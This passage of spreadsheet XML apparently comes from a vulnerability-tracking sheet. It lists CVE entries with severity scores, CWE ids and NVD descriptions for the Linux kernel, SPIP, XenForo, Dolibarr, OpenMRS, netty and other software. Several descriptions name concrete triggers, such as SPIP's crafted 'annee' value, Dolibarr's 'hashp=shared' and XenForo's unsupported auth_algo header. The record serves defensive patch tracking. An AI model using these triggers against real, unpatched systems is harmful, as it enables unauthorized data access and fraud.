find_cpntf_state()/manage_cpntf_state() holder has elevated cs_count drops
the reference without unlinking, leaving the entry discoverable with its
membership reference already consumed. A second revoke or a laundromat tick
then frees it while the reader still holds the pointer -- a
KASAN-detectable use-after-free at the reader's nfs4_put_cpntf_state().
This affected all three revoke paths:
  - The parent-stid drain (nfs4_free_cpntf_statelist()) repeatedly called
    _free_cpntf_state_locked() on the first list entry; a holder that had
    bumped cs_count made it return early, so the next iteration
    re-decremented and burned the holder's reference.
  - OFFLOAD_CANCEL (manage_cpntf_state()) and laundromat expiry likewise
    used _free_cpntf_state_locked() and could drop 2-&gt;1 without unlinking.
Add revoke_cpntf_state_locked(), which unhashes the entry from the IDR and
sc_cp_list first (deferring the final free to any holder), and use it from
all three revoke paths. The drain now walks with list_for_each_entry_safe()
and revokes each entry unconditionally, so it terminates in one pass per
entry regardless of cs_count. The unhash is gated on
!list_empty(&amp;cps-&gt;cp_list); the idr_remove() gate matters because
idr_alloc_cyclic() may have recycled the so_id by then. Keep
_free_cpntf_state_locked() for the reference-holder put path only, where a
concurrent revoke may already have unlinked the entry (its list_del_init()
then a no-op).</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89663</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89725</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: stm32: prevent out-of-bounds write on RX overflow
stm32_rx_done() appends each received CEC byte to rx_msg.msg[] using
rx_msg.len as the write index, incrementing it on every RXBR
(receive-byte-ready) interrupt without checking it against the buffer
size:
	cec-&gt;rx_msg.msg[cec-&gt;rx_msg.len++] = val &amp; 0xFF;
rx_msg.msg[] is a fixed CEC_MAX_MSG_SIZE (16) byte array in struct
cec_msg, and rx_msg.len is only reset on RXACKE/RXOVR or after a
completed message (RXEND). The number of bytes received before RXEND is
decided by the remote CEC device (it sets EOM), not by the driver. A
peer that keeps sending bytes without ending the message drives RXBR
repeatedly, pushing rx_msg.len past 16 and writing peer-controlled bytes
out of bounds into the surrounding memory. This is reachable in normal
operation once the driver has probed and receiving is enabled, from the
IRQ thread, without any local privilege.
The length check in the CEC core runs on the consumer side, after the
byte has been stored, so it does not prevent the overflow. Bound the
index in the driver before the store, as the other platform CEC drivers
already do (e.g. tegra_cec), dropping the excess bytes of an overlong
frame.
Found by static analysis tool CodeQL.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89725</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89729</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sensor-hub: Fix out-of-bounds write in sensor_hub_get_feature
sensor_hub_get_feature() clamps its return value to the caller's buffer
size, but the copy loop still copies field-&gt;report_size / 8 bytes for
each report value. A malicious HID descriptor can advertise a large
feature field size while an IIO caller supplies a small stack buffer,
such as a single s32, causing an out-of-bounds write.
HID core stores parsed report values in __s32 slots and clamps extracted
values to 32 bits. Reject feature fields that require more than one slot
per value, guard the total byte count calculation, and clamp each
per-value copy to the remaining caller buffer.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89729</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19486</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability in Google Cloud Gemini Enterprise Agent Platform App Builder versions prior to 2026-06-01 on Google Cloud Platform allows an unauthenticated attacker to leak the Compute Engine default service account access token.
This vulnerability was patched on 01 June 2026. Users will need to redeploy their previously deployed apps.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19486</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44715</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>OpenMRS is an open source electronic medical record system platform. Prior to versions 1.23.0 and 2.10.0, an authenticated user can trigger administrative DWR services. Specifically, the `startHl7ArchiveMigration` method is accessible, which should be restricted to admin-level accounts. Versions 1.23.0 and 2.10.0 patch the issue.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44715</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48059</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-codec-haproxy</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr"/>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-1286</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>### Impact
The HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path — no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48059</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72708</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains an unauthenticated blind SQL injection vulnerability in the SQL escaping layer that allows unauthenticated attackers to inject arbitrary SQL by supplying a crafted annee parameter value matching a word character followed by an open parenthesis, which bypasses escaping for date-type columns across MySQL, SQLite, and PostgreSQL backends. Attackers can exploit the always-present sitemap.xml.html template's annee criterion to embed unescaped time-based or boolean payloads into database queries, enabling extraction of arbitrary database content including the alea_ephemere secret used to sign SPIP action nonces.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72708</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81532</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>mongodb:bi_connector_odbc_driver</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>A user able to submit SQL through an application using the MongoDB Connector for BI ODBC driver can supply a positioned-cursor statement whose cursor name exceeds the size of an internal fixed-length buffer. Because the name length is not bounded before the driver builds its diagnostic message, memory adjacent to that buffer is overwritten with user-supplied content. This can terminate the hosting application process and may allow unintended code to run within it.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81532</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82578</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>When XML batch processing is turned on and the XPath option is selected, the raw batch input goes through a default XPath/JAXP setup with no entity restrictions, so XXE injection can allow data exfiltration and denial-of-service attacks.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82578</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88260</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>09832df1-09c1-45b4-8a85-16c601d30feb</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-288</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel and Improper validation of syntactic correctness of input vulnerability in Brainzcompany Zenius EMS 8.0 allows Remote Code Inclusion.
This issue affects Zenius EMS 8.0: through OAM (Build 109).</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88260</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89013</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>Dolibarr 23.0.4 before 24.0.1 ontains an authorization bypass vulnerability that allows unauthenticated attackers to read arbitrary files through the document storage endpoints by supplying a crafted hashp parameter value. Attackers can send a request with hashp=shared to skip token validation while satisfying the authorization condition in htdocs/document.php and htdocs/viewimage.php, gaining access to application logs, uploaded business documents, database backups containing password hashes, and files belonging to other multicompany entities.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89013</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89146</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-617</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>libp2p-rendezvous through 0.17.1 fails to validate registration TTL values in discovery responses, allowing attackers to trigger timer arithmetic overflow. A malicious rendezvous server can send a discovery response with an unbounded TTL value that causes the client node process to panic when computing the expiry timer.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89146</t>
        </is>
      </c>
    </row>
